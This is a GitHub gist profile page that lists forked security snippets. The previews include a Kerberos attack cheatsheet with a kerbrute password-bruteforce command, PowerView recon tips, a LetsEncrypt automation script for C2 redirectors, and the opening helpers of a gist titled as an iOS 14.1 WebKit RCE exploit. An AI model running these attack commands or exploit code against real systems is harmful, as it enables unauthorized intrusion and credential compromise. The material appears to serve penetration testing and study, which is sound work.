Skip to content

Instantly share code, notes, and snippets.

View pwntheworld's full-sized avatar

pwntheworld

16 followers · 117 following
  • Internet
View GitHub Profile
@pwntheworld
pwntheworld / kerberos_attacks_cheatsheet.md
Created July 29, 2022 23:11 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@pwntheworld
pwntheworld / PowerView-3.0-tricks.ps1
Created March 19, 2022 23:11 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@pwntheworld
pwntheworld / automate_letsencrypt.sh
Created March 19, 2022 20:07 — forked from sunnyneo/automate_letsencrypt.sh
Automate LetsEncrypt file and Apache configurations
#!/bin/bash
# Refs:
# https://bluescreenofjeff.com/2018-04-12-https-payload-and-c2-redirectors/
# https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh
# http://stackoverflow.com/questions/11617210/how-to-properly-import-a-selfsigned-certificate-into-java-keystore-that-is-avail
# https://www.digitalocean.com/community/tutorials/how-to-secure-apache-with-let-s-encrypt-on-ubuntu-14-04
# http://www.advancedpentest.com/help-malleable-c2
# https://maximilian-boehm.com/hp2121/Create-a-Java-Keystore-JKS-from-Let-s-Encrypt-Certificates.htm
# ./automate_letsencrypt.sh DOMAIN_NAME_TO_GENERATE_CERT IP_TO_BE_REDIRECTED TO
@pwntheworld
pwntheworld / resources.md
Created July 11, 2021 11:12 — forked from muff-in/resources.md
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@pwntheworld
pwntheworld / ImportParser.cpp
Created May 31, 2021 19:14 — forked from mrexodia/ImportParser.cpp
PE Import Table Parser
#include <windows.h>
#include <stdio.h>
int gtfo(const char* text = "")
{
printf("gtfo! (%s)\n", text);
return -1;
}
int main(int argc, char* argv[])
@pwntheworld
pwntheworld / converter.sh
Created May 31, 2021 08:20 — forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
#!/bin/bash
# Converter.sh by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./converter.sh [domain-list-file] [output-file]
echo -e "[+] Converter.sh by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
exit 1
@pwntheworld
pwntheworld / fuck.js
Created May 24, 2021 04:50 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));